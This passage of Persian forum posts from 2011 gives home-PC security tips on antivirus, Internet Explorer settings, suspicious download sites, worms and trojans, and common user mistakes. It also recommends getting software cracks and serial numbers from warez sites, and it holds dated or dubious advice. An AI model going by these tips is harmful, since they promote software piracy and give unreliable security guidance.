توجه داشته باشید که نرم افزارهای فوق را از سایتهای اصلی آنها بگیرید و اقدام به خرید آنها نکنید ، چون اکثر شرکتهایی که سی دی های آنتی ویروس را جمع آوری می کنند اصلا به این نکته توجه نمی کنند که این برنامه ها باید از سایت اصلی باشند و در بسیاری از موارد نسخه های کرک شده و گاها ویروسی را از سایتهای غیر قانونی یا به اصطلاح Warez می گیرند و این خود باعث می شود که برنامه قابلیت های خود را از دست بدهد . من پیشنهاد می کنم نسخه های نمایشی یا زمان دار این برنامه ها را دانلود کنید و سپس با دادن سریال نامبر آنها را رجیستر کنید . پک کامل مربوط به شرکت Symantec به نامNorton Internet Security و پک کامل McAfee با نام Internet Security Suite عرضه می شود.
۳: سطح ایمنی و ویروس کشی را در حالت High بگزارید تا تمام فایلها ، با هر پسوندی که هستند ویروس کشی شوند و توجه داشته باشید ویروس کش McAfee حالتی را با عنوان Heuristic دارد ، که به معنی اکتشافی است و در این حالت ویروس کش ، به طرز هوشمندانه ای اقدام به ویرس یابی می کند. توجه داشته باشید خیلی از ویروس هایی که در کامپیوتر شما پنهان شده اند به این روش آشکار می شوند . در حقیقت این نوع ویروس ها دو زیست هستند و مرتبا تغییر می کنند و از این رو ویروس کش ، در حالت عادی نمی تواند آنها را بیابد.
۴: Service Packهای ویندوز را دانلود کنید و همیشه ویندوز خود را به روز نگه دارید . البته با سرعت پایین اینترنت در ایران این کار عملا غیر ممکن است و به همین خاطر شما می توانید Service Pack 2 ویندوز را از طریق سی دی خریداری کنید.
۵: تنظیمات صحیح خود سیستم عامل و عدم به اشتراک گذاری فایلها. این تنظیمات عبارتند از غیر فعال کردن NetBios و سرویس Remote Assistance و بستن مسیر ورودی کرم MsBlaster که حفره آن همیشه ممکن است خطر ساز باشد. به علت حجم بالای مقاله روش انجام این کارها نوشته نشده است ولی در صورت نیاز درخواست بگذارید.
۶: عدم استفاده از برنامه های به اشتراک گذاری فایل از جمله Kazza که به علت نقص های بیشمار و همراه داشتن برنامه های جاسوسی استفاده از آن دیوانگی است.
۷: عدم استفاده از Internet Explorer . خیلی از برنامه های جاسوسی و Trojanها فقط در صورتی دانلود و در نتیجه فعال می شوند که صفحه مربوطه توسط Internet Explorer باز شود ، همچنین خیلی از کرمهای اینترنتی در صورت اجرا شدن و باز بودن اینترنت اکسپلورر گسترش پیدا می کنند . پیشنهاد می کنم از یک مرورگر دیگر به جای Internet Explorer استفاده کنید و قابلیت های PlugIn و Java Script آن را نیز غیر فعال کنید . در این میان مرورگر Opera و فایرفاکس از همه کارآمد تر می باشند .
۸: افزایش امنیت Internet Explorer . با همه این احوال موقعیتی پیش می آید که باید از مرورگر استاندارد اینترنت یعنی Internet Explorer استفاده کنید به همین خاطر روش های افزایش امنیت Internet Explorer را نیز بیان می کنم .
Cookie
Internet Explorer > Internet Option > Delete Cookie
Internet explorer > Internet Option > Delete Files
8.1: جلوی کوکی هایی که می توانند خطرناک باشند را بگیریم . برای این کار مراحل زیر را طی کنید و حالت Medium High را انتخاب کنید:
Internet Explorer > Internet Option > {tab} Privacy
8.2: استفاده از برنامه های ضد پاپ آپ . خیلی از PopUp ها باعث قفل شدن و در نتیجه بسته شدنIE می شوند و حتی می توانند حاوی کدهای مخرب و ویروس نیز باشند . بهترین برنامه هایی که برای این کار وجود دارد Zero PopUp و AdWare 6.0 است ، البته Adware بسیار بهتر عمل می کند و علاوه بر قابلیت ضد Pop up قابلیت Anti Spyware را نیز دارا می باشد .
۸٫۳: پاک کردن و غیر فعال کردن ذخیره سازی پسورد توسط IE . با توجه به ذخیره شدن پسورد ایمیل ها و یا وبلاگ شخصی شما در IE، از این رو می تواند مورد سو استفاده هکرها قرار گیرد . برای انجام این کار مراحل زیر را طی کنید:
Internet Explorer > Internet Option > {tab} Content > Auto Complete
و سپس دکمه Clear Password را می زنیم و بعد از آن تیک گزینه User Names & Passwords on Forms را بر می داریم .
صفحاتی که عکس یا عکسهای آنها نمایان نمی شود را Refresh نکنیم ، چون این یکی از روشهای آلوده سازی کامپیوتر قربانی به ویروس یا تروجان است و برای دیدن عکس مذکور روی آن کلیک راست بزنید و سپس گزینه Show Picture را بزنید . ممکن است سایتی حتی قسمتهای دیگرش نیز به درستی باز نشده باشد در این صورت نیزRefresh نکنید و آدرس آن سایت را در یک صفحه جدید IE وارد کنید .
۸٫۴: استفاده از برنامه های ضد برنامه های جاسوسی یا همان Anti Spyware و Anti AdWare که بهترین آنها Adware 6.0 و SpyHunter و SpySweeper می باشند و آنها را به ترتیب از سایتهای زیر می توانید دانلود کنید .
www.download.com
www.tooto.com
www.webattack.com
نکته ۱: برنامه AdWare تنها اشکالی که دارد این است که باید ابتدا یک فایل کوچک را دانلود کنید و بعد از اجرای آن به طور خودکار برنامه اصلی که حجم زیادتری دارد دانلود می شود و شما نمی توانید آن را با برنامه های افزایش دهنده سرعت دانلود کنید و همچنین برنامه اصلی را در اختیار نخواهید داشت تا بعد از تعویض ویندوز دوباره آن را نصب کنید و هر بار که ویندوز نصب می کنید باید آن را دوباره دانلود کنید .
نکته ۲: برنامه SpySweeper یک برنامه بسیار عالی است که به دائما در حال بررسی کوکی ها و دیگر برنامه های مخرب احتمالی است و به طور خودکار کوکی های خطرناک را پاک می کند . این برنامه دارای یک سکنر Spyware هم هست و مثل ویروس کش ها می تواند درایوهای هارد را بررسی کند ولی با این تفاوت که این برنامه به جای ویروس ، برنامه های جاسوسی را یافته و آنها را از بین می برد. تنها اشکال این برنامه آن است که برنامه Dap که برای دریافت تبلیغات و رجیستر شدن مرتبا به سایتش مراجعه و اطلاعات ارسال می کند را به عنوان برنامه جاسوسی می شناسد و آن را پاک می کند .
نکته ۳: برنامه SpyHunter بیشتر به درد کاربران حرفه ای تر می خورد و خود کاربر باید جلوی فایلهایی را که به اینترنت وصل می شوند را با شناخت کافی که دارد بگیرد . این برنامه خیلی کم حجم قابلیت کنترل Spyware ها و کد های مخربی که در خود سایت قرار دارند {به صورت فایل جداگانه {server} نیستند} و با آن Load می شوند را دارد و همه آنها را به طور خودکار Block می کند . همچنین با کمک این برنامه می توانید ارسال اطلاعات توسط هر تروجانی را متوقف کنید و حتی بهترین آنتی ویروس ها هم ممکن است که یک تروجان جدید را نشناسند و این برنامه از این نظر بهترین انتخاب است .
برای درک بهتر ادامه می دهم که این نرم افزار فایلهایی را که اطلاعات ارسال می کنند را monitor کرده و به طور پیش فرض در لیست سبز قرار می دهد و شما می توانید فایل مورد نظر را در لیست قرمز قرار دهید ، بدین ترتیب فایل مذکور بلوکه می شود . نکته جالبی که در اینجا نهفته است این است که می توانید فایل هایی نظیر Ie.exe یا dap.exe را در لیست قرمز قرار دهید تا امکان کار کردن با آنها میسر نباشد ، البته بهتر است این برنامه را همراه برنامه های فوق به کارگیرید .
۹: از چه سایتی برنامه Download می کنیم . ابتدا باید سایت مورد نظر را از آدرس فایلی که برای دانلود وجود دارد مورد بررسی قرار دهیم { مثلا www.tooto.com/spyhunter.zip را داریم و باید به سایت www.tooto.com برویم} و مطمئن شویم که برنامه مربوطه برای همین سایت است و هیچ وقت برنامه ها را از سایتهای ثالث نگیریم چون هیچ دلیل منطقی برای کار آنها وجود ندارد و بدون شک برنامه ای که ما از آنها می گیریم دارای ویروس یا تروجان است و این نکته باید بسیار مورد توجه شرکتهای رایت سی دی و سایتهایی باشد که برنامه برای دانلود معرفی می کنند . معمولا سایتهایی که برنامه های شرکتهای دیگر را برای دانلود می گذارند اسم های عجیب و غریب و طولانی دارند { این دو آدرس را مقایسه کنید : www.tooto.com/spyhunter.zip ، www.aktami.cu.ne/pub~/spyhunter.zip}
یکی دیگر از مشخصه های سایتهایی که برنامه هایی که برای دانلود گذاشته اند متعلق به خودشان نیست آن است که آنها لیست های طویلی از برنامه های مختلف دارند که همگی آنها از همان {سایت}Domain و بدون توضیح ، Preview و قسمت Help می باشند ، باید بدانید سایتی که برنامه خودش را برای دانلود گذاشته اولا تعداد محدودی برنامه دارد ، ثانیا برنامه را همراه Tutorial و Help و خیلی چیزهای دیگه معرفی می کند و آدرس مشخصی دارد ، همچنین در سایت اصلی برنامه عکسها و Screen Shot هایی همراه با توضیحات اضافه از برنامه مورد نظر وجود دارد .
سایتهایی که آدرس آنها بصورت IPاست بسیار خطرناکند و ممکن است Admin آن سایت با بدست آوردن IP شما که از طریق بازدید شما از آن سایت به دست او می رسد اقدام به هک کردن شما بکند یا همانطور که گفتم برنامه ای که در آن سایت برای دانلود قرار گرفته حاوی ویروس یا تروجان … باشد . نمونه یک سایت و فایل خطرناک که آدرس آنها به جای Domain آدرسIP می باشد: { IP حاوی چهار دسته عدد می باشد}
http://126.38.26.32.com/global.html, http://85.191.88.251.com/program.exe
حال ممکن است این سوال پیش بیاید که فلان برنامه دارای محدودیت زمانی یا عملکرد است و اگر ما آن برنامه را از این سایت اصلی دانلود کنیم چگونه می توانیم محدودیت آن را از بین ببریم و در جواب سوال شما باید بگویم که ابتدا نسخه Trial یا Demo برنامه را از سایت اصلی بگیرید و بعد از آن کرک آن برنامه را که حجم خیلی کمی هم دارد را از سایتهایی که برای این منظور می باشند دریافت کنید ، البته در موارد بسیار نادری اتفاق می افتد که کرک مربوطه حاوی ویروس است . ولی احتمال ویروسی شدن توسط آن خیلی کمتر از دریافت نسخه کامل کرک شده برنامه است و بهتر است از کرکهایی که شماره سریال در اختیار شما می گذارند استفاده کنید و کرکهایی که به جای فایل اصلی جایگزین می شوند خیلی مطمئن نیستند و حتی ممکن است از قابلیت برنامه بکاهند و برنامه انطور که می بایست کار نکند . خاطر نشان می کنم دریافت سریال برنامه هیچ خطری ندارد و مطمئن ترین راه کرک کردن نرم افزار است .
به سایت هایی که برنامه ها را کرک می کنند و آنها را برای دانلود می گذارند سایتهای Warez یا غیر قانونی می گویند . برای پیدا کردن سایت اصلی برنامه باید در گوگل به این صورت جستجو کنید :
Official Site + Name of Program
( در قسمت Name of Program باید نام برنامه مربوطه را بنویسید )
۱۰: همیشه به آی و پسوند عکسهایی که از طریق چت می گیرید توجه کنید و از طرف مقابل بخواهید که عکسش را به ایمیلتان بفرستد چون خود یاهو دارای Norton Anti Virus می باشد و فایل قبل از دانلود شدن Scan می شود و فقط در مواردی نادر ممکن است Yahoo ویروسی که همراه عکس هست را نشناسد به همین خاطر عکس مربوطه را پس از Download با ویروس کش McAfee نیز Scan کنید .
۱۱: از کار انداختن System Restore . همانطور که می دانید فایلهایی که پسوند های سیستمی مثلdll ، exe و غیره داشته باشند ، پس از پاک کردن یا اعمال تغییرات در System Restore ذخیره می شوند و این مسئله زمانی خطر ساز می شود که یک فایل ویروسی را به صورت دستی یا به کمک برنامه های ضد ویروس یا ضد Spyware پاک{Delete} یا تمیز{Clean} کرده اید ، ولی قافل از اینکه ویندوز این فایلها را در جایی دیگر حفظ کرده است و همچنان ویروس به فعالیت خود ادامه می دهد . برای از کار انداختنSystem Restore مراحل زیر را دنبال کنید:
Control Panel > System > {tab} System Restore > Turn off System Restore on All Drive
12: شاید زیاد اتفاق افتاده باشد که از طریق چت یا از یک سایت مشکوک عکس Download کرده باشید و نگرانید که این فایل حاوی تروجان یا ویروس مخصوص فایلهای JPG باشد و به همین خاطر عکس مربوطه را در کافی نت باز کنید و کلید F11 را بزنید و سپس کلید Print Screen را فشار دهید و بعد از آن برنامه Paint را باز کنید و Ctrl + V را بزنید و حالا می توانید عکس را با خیال راحت با هر پسوندی ذخیره کنید.
شاید بپرسید چرا برای این کار از برنامه های Picture Converter استفاده نکنیم و در جوابتان باید بگویم که ممکن است در فرایند تبدیل فایل ممکن است کدهای ویروس نیز ترجمه شده و همراه عکس Convert شده باقی بمانند ولی در روش فوق ، فرایند تهیه عکس هیچ نیازی به عکس مشکوک به ویروس ندارد .
۱۳: هرگز اسم کامپیوتر {Computer Name} خود را واقعی ندهید . هکرها می توانند اسم کامپیوتر شما و در نتیجه اسم شما را بیابند و برای جلوگیری از این کار یک اسم مستعار برای خود انتخاب کنید . همچنین از وارد کردن اسم و مشخصات واقعی خود در برنامه هایی مثلPhotoshop و غیره که در زمان نصب از شما اسم و مشخصات می خواهند نیز خودداری کنید .
۱۴: تبدیل متون به عکس برای امنیت بیشتر
روش اول: تبدیل متون از Word Pad به فایل تصویری توسط Paint
در این روش کافی است متن مورد نظر را که در برنامه Word Pad درج شده انتخاب کرده و کلیدهایCtrl + C را بزنیم و سپس برنامه Paint را باز کرده و کلید های CTRL + V را بزنیم . توجه داشته باشید هرچه طول متن بیشتر باشد Font ریزتر می شود.
نکته: اگر متن مورد نظر خیلی طولانی باشد ویندوز قادر به کپی کردن آن به Paint نیست و برای اینکه بتوانید متون بزرگ را به عکس تبدیل کنید باید در چند مرحله متن را کپی کرده و سپس در Paint بریزید و در نتیجه متن را به چندین فایل تصویری تبدیل کنید .
روش دوم: در این روش ابتدا Paint را باز کرده و سپس از ابزاری که به شکل A می باشد را انتخاب می کنیم و یک کادر باز می کنیم و در آن می توانیم متن را بنویسم یا اینکه متن کپی شده را Paste کنیم.
نکته : اگر کادر مربوط به تنظیمات متن باز نشد باید از منوی View گزینه Text toolbar را انتخاب کنید .
روش سوم: ابتدا کلید Print Screen که در بالای کلید های جهت نمای صفحه کلید است را می زنیم و سپس Paint را باز کرده و کلید های Ctrl + V را می زنیم و به این ترتیب متن مربوطه را به عکس تبدیل می کنیم.
نکته: برای کپی کردن عکسهایی که نمی توان آنها را مستقیما از طریق Internet Explorer به روش
Right click > save picture as
یکی از مزایای تبدیل متن به عکس این است که برای خواندن متن مورد نظر نیازی به داشتن ویندوز یا برنامه خاصی ندارید .
mozhgan
02-15-2011, 10:55 PM
کرم های خطرناک رایانه
کرمها اصولاً ویروس نیستند با این وجود تفاوت بین آنها بسیار اندک است و معمولاً در اخبار روزمره آنها را با یکدیگر اشتباه می گیرند. ویروسها یک کامپیوتر منفرد را آلوده می کنند و سعی نمی کنند به کامپیوتر دیگری راه پیدا کنند اما کرمها بسیار شرور ترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراک گذاشتن فایلها بوسیله email یا بوسیله فلاپی دیسک ها).
کرمها به شدت علاقه مندند که فقط خود را در میان یک شبکه گسترش دهند. آنها به طور خود کار خودشان را به کامپیوترهای دیگر انتقال می دهند به علت اینکه انتقال آنها بین کامپیوترها به طور خودکار انجام می پذیرد سرعت گسترش آنها بسیار سریعتر از ویروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.
معمولترین راه گسترش یک کرم این است که خود را به همه آدرسهای email ای که شما در address book خود لیست کرده اید برساند ، یا outlook شرکت مایکروسافت برنامه email ای است که بیشترین آسیب پذیری را در برابر حمله کرمها دارد ، فقط به این دلیل که عمومی ترین برنامه است. برای کاهش دادن احتمال آلوده شدن به کرمها شما می توانید مراحل زیر را اجرا کنید:
هیچ فایل الصاقی ( attachment ) غیر منتظره ای را در email های خود باز نکنید ( بخصوص آنهایی را که شامل پیغامهای معمول مانند در این جا فایلی که شما درخواست کرده اید وجود دارد. ) هر چند آنها از منابع مطمئنی برای شما ارسال شده باشند. برای فرستنده email ای بفرستید (reply ) و از او سئوال کنید او واقعاً چنین فایلی برای شما فرستاده است یا نه؟
یک آنتی ویروس نصب کنید و آن را مرتباً up to date کنید.
اگر ممکن است از نرم افزار email ای به غیر از Outlook Express استفاده کنید.
اولین نمونه های کرمی که به خوبی منتشر شده “Love Letter” نام دارد که با فرستادن خود به آدرس email ای که در address book نرم افزار Outlook Express وجود دارند منتشر می شود به راحتی کپی کردن فایل در کامپیوتر قربانی خود را وارد می کند و با یک عنوان به صورت “I LOVE YOU” وارد می شود و پیغام آن به صورت زیر است :
“Rindly chek the attached LOVE LETTER coming from me”
بدلیل اینکه email از یک فرد شناخته شده برای گیرنده ارسال شده است بسیاری از مردم گول می خورند و کرم در حجم وسیع گسترش پیدا می کند. اگر چه به کامپیوتر قربانی آسیب وارد می شود ولی آسیب اصلی به کل شبکه وارد می شود و همه آن را آلوده می کند.
اسب تراوا چیز جالبی بنظر می رسد اما چیزهای آسیب رسان و کثیفی در بر دارد. و در لباس خدمات مفید یا پیوستهای ( attachments ) جذاب در email مثلاً یک screen saver پخش می شود. آنها فایلهی الصاقی برای شما می فرستند که آنقدر برای شما جالب است که آنها را برای دوستانتان می فرستید. در حالیکه آثار مخرب آن پنهان بوده با تأخیر عمل می کند بنابراین شما نمی دانید چیزی که در حال فرستادن آن هستید یک فایل خطرناک است.
در مواقع دیگر این کرمها تکثیر می شوند مانند یک کرم اینترنتی و خود را به صورت اتوماتیک به کامپیوترهای دیگر می رسانند و معمولاً از Outlook Express استفاده می کنند.
mozhgan
02-15-2011, 10:57 PM
متداولترین اشتباهات کاربران در هنگام کار با رایانه
در این ترفند قصد داریم به معرفی متداول ترین اشتباهات کاربران در تمامی سطوح دانسته ها بپردازیم. بیشتر این اشتباهات به مسائل امنیتی مربوط میشود. نصب بی رویه نرم افزار خصوصأ نرم افزارهائی که از طریق اینترنت دریافت می گردد ، کلیک بر روی دکمه OK در یک جعبه محاوره ای که ممکن است باعث تغییر تنظیمات یک برنامه و در نهایت رفتار یک کامپیوتر و حتی در برخی موارد از کارافتادن سیستم گردد ، نمونه هائی اندک در این زمینه می باشند. پیشنهاد میکنیم این ترفند را حتما با دقت مطالعه بفرمایید چرا که ممکن است شما نیز این اشتباهات را مرتکب شوید و خودتان بی خبر باشید!
اتصال کامپیوتر به برق بدون استفاده از یک سیستم حفاظتی به منظور کنترل نوسانات جریان برق : عدم رعایت این موضوع می تواند باعث صدمه فیزیکی به کامپیوتر و از بین رفتن داده موجود بر روی آن گردد . برخی از کاربران این تصور را دارند که صرفا” پس از بروز یک شوک الکتریکی قوی احتمال بروز مشکل برای سیستم وجود خواهد داشت . ضمن رد این برداشت ، می بایست به این نکته اشاره گردد که هر چیزی که بتواند در سیگنال های الکتریکی وقفه ای را ایجاد و جریان برق را مجددا” از ابتدا آغاز نماید ، می تواند باعث سوزاندن قطعات کامپیوتر گردد . استفاده از برخی وسایل برقی ، خصوصا” دستگاه هائی نظیر سشوار و هیتر که به ولتاژ بالائی نیاز دارند ، می تواند باعث ایجاد نوسانات شدید گردد . پس از قطع جریان برق و اتصال مجدد آن نیز ممکن است تا رسیدن به یک سطح ولتاژ مطلوب ، زمانی بطول انجامد ( هر چند اندک ) و در همین فاصله ممکن است مشکلات خاصی برای برخی از دستگاه ها ایجاد گردد .
برای حفاظت سسیستم در مقابل خرابی ناشی از نوسانات شدید جریان برق ، می بایست از یک محافظ مناسب استفاده نمود . استفاده از ups ( برگرفته از Uninterruptible Power Supply ) در بسیاری از موارد نسبت به دستگاه های محافظ ترجیح داده شود ، چراکه این نوع دستگاه ها دارای امکانات مناسبی می باشند که می توان علیرغم قطع جریان برق همچنان از کامپیوتر استفاده و در صورت لزوم سیستم را بطور موفقیت آمیز خاموش نمود .
استفاده از اینترنت بدون فایروال : تعداد زیادی از کاربران ( خصوصا” کاربرانی که از طریق منزل به اینترنت متصل می شوند ) ، کامپیوتر خود را به مودم متصل و بلافاصله از اینترنت استفاده می نمایند ، بدون این که نسبت به این موضوع آگاهی داشته باشند که خود را در معرض چه تهدیداتی قرار داده اند . هر کامپیوتر متصل به اینترنت می بایست با بکارگیری فایروال ، حفاظت گردد . فایروال ، می تواند بخشی درون مودم / روتر و یا یک دستگاه جداگانه باشد که بین مودم /روتر و کامپیوتر قرار می گیرد و یا یک نرم افزار خاص باشد که بر روی کامپیوتر نصب می گردد (نظیر فایروال ارائه شده به همراه ویندوز XP ) . نصب یک فایروال به تنهائی کافی نبوده و می بایست پیکربندی آن را با رعایت مسائل امنیتی انجام داد .
قصور در اجراء و یا بهنگام سازی نرم افزارهای آنتی ویروس و آنتی spyware : بدون شک ، برنامه های آنتی ویروس دارای یک نقش اساسی به منظور ایمن سازی یک کامپیوتر می باشند . به دنبال نصب اینگونه نرم افزارها ممکن است کاربران با مشکلات خاصی در خصوص اجرای برخی برنامه های کامپیوتری مواجه و یا به منظور نگهداری و بهنگام سازی آنان هزینه های خاصی را متقبل شوند ، ولی مسائل فوق نمی تواند دلایل قانع کننده و منطقی به منظور عدم نصب و بهنگام سازی یک نرم افزار آنتی ویروس بر روی سیستم باشد . برنامه های مخرب که نرم افزارهای آنتی ویروس آنان را به عنوان ویروس ، تروجان و یا کرم ها تشخیص خواهند داد ، علاوه بر این که ممکن است مشکلات خاصی را برای یک سیستم ایجاد نمایند ، می تواند یک شبکه کامپیوتری را نیر با مشکلات عدیده ای مواجه نموده و حتی باعث از کارافتادن سرویس های شبکه گردند .
spyware ، نوع دیگری از تهدیدات فزاینده در عصر حاضر می باشند که بر روی کامپیوتر کاربران و بدون آگاهی آنان نصب و اقدام به جمع آوری اطلاعات و ارسال آنان به یک مکان دیگر می نمایند . برنامه های آنتی ویروس ، اغلب قادر به تشخیص و برخورد مناسب با این نوع برنامه های مخرب نمی باشند ، بنابراین می بایست از یک نرم افزار اختصاصی تشخیص spyware استفاده گردد .
نصب و uninstall برنامه های مختلف خصوصا” نسخه های beta : تعداد زیادی از کاربران کامپیوتر تمایل دارند که از آخرین فن آوری ها و نرم افزارهای موجود استفاده نمایند . این گروه از کاربران، همواره اقدام به نصب نسخه های جدید نرم افزارها بر روی سیستم خود می نمایند . نسخه های beta معمولا” رایگان می باشند و این فرصت را در اختیار کاربران علاقه مند قرار می دهند که قبل از ارائه نسخه نهائی که اکثر کاربران با آن کار خواهند کرد ، با ویژگی ها و پتانسیل های آن آشنا شوند . همچنین ، امروزه می توان نرم افزارهای shareware و freeware متعددی را در اینترنت یافت که کاربران علاقه مند و کنجکاو را ترغیب به دریافت و نصب آنان بر روی سیستم بدون توجه به مسائل امنیتی می نماید .
به موازات افزایش تعداد نرم افزارهای نصب شده و یا متعاقب آن uninstall کردن آنها ، احتمال بروز مشکلات متعددی برای کاربران وجود خواهد داشت . حتی در صورتی که نرم افزارهای اشاره شده قانونی باشند ، با نصب و uninstall آنها ، ممکن است برای ریجستری مشکل ایجاد گردد چراکه تمامی برنامه های uninstall قادر به حذف تمامی تنظمیات انجام شده در ریجستری نمی باشند. مشکل فوق ، در نهایت کند شدن سیستم را به دنبال خواهد داشت .
پیشنهاد می گردد ، صرفا” برنامه هائی را که ضرورت استفاده واقعی از آنان احساس و از عملکرد آنان اطمینان حاصل شده است را بر روی سیستم نصب نمود. همچنین ، می بایست تعداد دفعات نصب و uninstall نرم افزار را به حداقل مقدار ممکن رساند .
پرکردن فضای ذخیره سازی هارد دیسک و تقسیم آن به بخش های مختلف (fragmentation) : یکی از نتایج نصب و uninstall کردن برنامه ها و یا اضافه و حذف داده ، fragmentation دیسک است . علت بروز مشکل فوق به ماهیت و روش ذخیره اطلاعات برمی گردد . در یک دیسک جدید ، از بخش های پیوسته و پشت سرهم ( موسوم به کلاستر ) در زمان ذخیره یک فایل استفاده می گردد . در صورتی که اقدام به حذف فایلی گردد که پنج کلاستر را اشغال کرده است و در ادامه فایل جدیدی را ایجاد نمائیم که به هشت کلاستر جهت ذخیره شدن نیاز داشته باشد ، پنج کلاستر اولیه به آن اختصاص داده شده و سه کلاستر دیگر از بخش دیگری بر روی دیسک به آن اختصاص داده می شود . بدین ترتیب ، اطلاعات موجود در فایل در دو مکان متفاوت ذخیره می گردند . در ادامه و به منظور دستیابی به فایل ، هدهای هارد دیسک می بایست با قرار گرفتن در مکان های مختلف اقدام به بازیابی اطلاعات یک فایل نمایند . بدین ترتیب ، سرعت دستیابی به فایل کاهش و در صورتی که فایل اشاره شده مربوط به یک برنامه باشد ، سرعت آن برنامه نیز کاهش خواهد یافت .
برای استفاده از برنامه disk defragmenter در ویندوز می توان از مسیر Programs | Accessories | System Tools برنامه را فعال و یا از سایر برنامه های موجود استفاده نمود . برنامه های فوق با سازماندهی مجدد فایل ها ، آنها را حتی المقدور در مکان های پشت سرهم قرار خواهند داد . بدین تریتب ، سرعت دستیابی به اطلاعات ذخیره شده بر روی هارد دیسک افزایش خواهد یافت .
باز کردن تمامی ضمائم همراه نامه های الکترونکیی : فایل های ضمیمه ارسالی همراه یک email می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید. حذف اطلاعات موجود بر روی سیستم و یا ارسال ویروس برای افرادی که آدرس آنان در لیست تماس می باشد از جمله مشکلات فوق می باشد . متداولترین فایل های ضمیمه خطرناک ، فایل هائی اجرائی (فایل هائی که توان اجرای کد را دارند) با انشعاب exe . و یا cmd . می باشند . فایل هائی که خود توان اجرای مستقیم را ندارند نظیر فایل های doc . برنامه word و یا فایل های xls . برنامه اکسل ، نیز می توانند حاوی کدهای مخرب باشند . اسکریپت ها ( Vbscript ,javaScript و فلش ) نیز مستقیما” اجراء نمی شوند ولی می توانند توسط سایر برنامه ها اجراء شوند .
برخی از کاربران این تصور را دارند که فایل های متن با انشعاب txt . و یا فایل های گرافیکی (gif, .jpg, .bmp .) ایمن می باشند ولی همواره اینچنین نخواهد بود . انشعاب یک فایل می تواند جعل شود و مهاجمان از تنظیمات پیش فرض ویندوز که انشعاب فایل های متداول را نمایش نمی دهد ، سوء استفاده نمایند . به عنوان نمونه ، فایل greatfile.jpg.exe که انشعاب واقعی آن مخفی است به صورت greatfile.jpg نمایش داده خواهد شد و کاربران فکر می کنند که فایل فوق یک فایل گرافیکی است ولی در واقع یک برنامه مخرب است .
کاربران کامپیوتر می بایست صرفا” در مواردی که انتظار دریافت یک email به همراه ضمیمه مورد نظر را از یک منبع تائید شده و در آن زمان خاص دارند ، اقدام به بازنمودن فایل های ضمیمه نمایند . حتی در صورتی که یک نامه الکترونیکی به همراه فایل ضمیمه ای را دریافت می نمائید که نسبت به هویت ارسال کننده آن هیچگونه تردیدی وجود ندارد ، این احتمال وجود خواهد داشت که آدرس فوق توسط مهاجمان جعل و یا توسط کامپیوتری آلوده به ویروس و بدون اطلاع صاحب آن ارسال شده باشد .
کلیک بر روی هر چیز : باز نمودن فایل های ضمیمه تنها نوع کلیک بر روی موس نمی باشد که می تواند مشکلات امنیتی متعددی را برای کاربران ایجاد نماید . کلیک بر روی لینک موجود در یک نامه الکترونیکی و یا صفحه وب نیز می تواند کاربران را به سمت یک وب سایت مخرب هدایت نماید . در این نوع سایت ها ، احتمال انجام هرگونه عملیات مخربی وجود خواهد داشت . پاک کردن هارد دیسک ، نصب یک backdoor که به مهاجمان این امکان را خواهد داد تا کنترل یک سیستم را بدست بگیرند ، نمونه هائی در این زمینه می باشد .
کلیک بر روی لینک های نامناسب ، می تواند کاربران را به سمت یک وب سایت نامناسب نظیر سایت های پرونوگرافی ، موزیک ها و یا نرم افزارهای سرقت شده و سایر محتویاتی که ممکن است برای کاربران مشکلاتی را به دنبال داشته باشد ، هدایت نماید . قبل از کلیک بر روی یک لینک ، می بایست نسبت به عواقب آن فکر کرد و هرگز جذب پیام های اغواکننده نگردید .
اشتراک فایل ها و اطلاعات : شاید به اشتراک گذاشتن برخی چیزها در زندگی روزمره امری مطلوب باشد ( نظیر اشتراک دانش ) ولی در زمان حضور در یک شبکه با کاربران گمنام و بیشمار ، اشتراک فایل ها و … می تواند تهدیدات امنیتی خاص خود را برای کاربران به دنبال داشته باشد . در صورتی که امکان اشتراک فایل و چاپگر فعال است ، سایر کاربران می توانند از راه دور به سیستم متصل و به داده موجود بر روی آن دستیابی داشته باشند . حتی المقدور می بایست گزینه file and printer sharing غیرفعال گردد و در صورتی که لازم است برخی فولدرها به اشتراک گذاشته شوند ، می بایست از آنان در دو سطح متفاوت حفاظت نمود : مجوزهای share-level و مجوزهای file-level ( مجوزهای مبتنی بر NTFS ) . در چنین مواردی می بایست از استحکام رمزهای عبور در نظر گرفته شده برای local account و local administrator نیز اطمینان حاصل نمود .
انتخاب رمزهای عبور ضعیف : انتخاب رمزهای عبور ضعیف می تواند کاربران را در معرض تهدیدات امنیتی متعددی قرار دهد . حتی اگر کاربران وابسته به شبکه ای نمی باشند که مدیریت شبکه از آنان می خواهد که از رمزهای عبور قوی استفاده و بطور مستمر آنها را تغییر دهند ، می بایست از رمزهای عبور قوی استفاده گردد . از رمزهای عبوری که امکان حدس آنها به سادگی وجود دارد نظیر تاریخ تولد ، نام فرد مورد علاقه ، شماره شناسنامه و … نمی بایست استفاده گردد . تشخیص رمزهای عبور طولانی برای مهاجمان بمراتب مشکل تر است . بنابراین ، پیشنهاد می گردد که از رمزهای عبوری با حداقل هشت حرف استفاده گردد ( چهارده حرف مناسب تر است ) . در برخی موارد مهاجمان به منظور تشخیص رمز عبور کاربران از روش هائی موسوم به حملات “دیکشنری ” استفاده می نمایند . بنابراین ، نمی بایست رمز عبور خود را از کلماتی انتخاب نمود که مشابه آن در دیکشنری موجود باشد . رمز عبوری را انتخاب ننمائید که به دلیل مشکل بودن بخاطر سپردن آن مجبور به نوشتن آن در یک مکان دیگر شد، چراکه این احتمال وجود خواهد داشت که مهاجمان نیز به آن دستیابی پیدا نمایند . برای ایجاد یک رمز عبور ، می توان یک عبارت خاص را در نظر گرفت و از حروف اول هر یک از کلمات آن استفاده نمود.
عدم توجه به ایجاد یک استراتژی خاص برای backup : حتی اگر شما تمامی موارد اشاره شده را رعایت نمائید ، همچنان این احتمال وجود خواهد داشت که مهاجمان به سیستم شما دستیابی و داده موجود بر روی آن را حذف و یا حتی تمامی اطلاعات موجود بر روی هارددیسک را پاک کنند . بنابراین ، لازم است که همواره از اطلاعات مهم موجود backup گرفته شود و از یک برنامه زمانبندی خاص در این رابطه استفاده گردد .
